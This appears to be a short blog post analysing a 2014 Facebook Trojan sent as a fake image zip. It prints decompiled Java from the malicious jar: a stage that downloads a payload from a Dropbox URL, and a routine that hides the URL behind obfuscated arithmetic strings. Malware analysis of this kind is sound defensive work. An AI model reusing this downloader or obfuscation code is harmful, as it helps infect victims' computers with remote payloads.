Code, Web

Analyzing Facebook Trojan spreading via Private Messages

I first received this malware via private message on March 6th, 2014.

facebook-message

IMG_00161.zip , I’m guessing it comes in any IMG_00XXX.zip flavor. While it may look like a zipped image file from a friend, it contains a malicious jar file. Dont make the mistake of executing the jar file.

VirusTotal scan gives a detection ratio of 13 / 49.

Unpacking Malware

You can use any Java Decompiler to check the jar file.

decompiled-jar

public static void main(String[] args)
 throws Exception
{
	new File("C:temp").mkdir();
	File u = new File("C:tempgoofy.dat");
	if (u.exists())
	{
	sikoseTo();
	} else {
	String toSpitiTouPepe =
"http://dl.dropboxusercontent.com/s/updaxp12lp20k77/module.dat?dl=1";
	String oProorismosTouPepe = "C:tempgoofy.dat";
	RixtoKato(toSpitiTouPepe, oProorismosTouPepe);
	}
}

The jar downloads the .dat file at DropBox URL. If you try the DropBox URL the file seems to be deleted now.

Update : Newer codes have obfuscated URLs

public static String MTGJVA()
throws ScriptException
{
 ScriptEngineManager localScriptEngineManager = 
 new ScriptEngineManager();
 ScriptEngine localScriptEngine =
 localScriptEngineManager.getEngineByName("JavaScript");
 String[] arrayOfString = { "-1041+1155", "668317/6617", "75499/733",
 "846055/7357", "969488/8216", "2247-2133", "8087-8036",
 "104000/2080", "1698-1666", "80041/1703", "-785+900" };
 DecimalFormat localDecimalFormat = new DecimalFormat("#.#");
 StringBuilder localStringBuilder = 
 new StringBuilder(arrayOfString.length);
 for (int i = 0; i < arrayOfString.length; i++)
 {
 Object localObject = localScriptEngine.eval(arrayOfString[i]);
 int j = Integer.parseInt(localDecimalFormat.format(localObject));
 localStringBuilder.append((char)j);
 }
 return localStringBuilder.toString();
}

 

Conclusion

  • Clearly this affects only Windows platform ; C:temp
  • In case you are affected, scan your PC and change your facebook password
Tagged , , , , , , , ,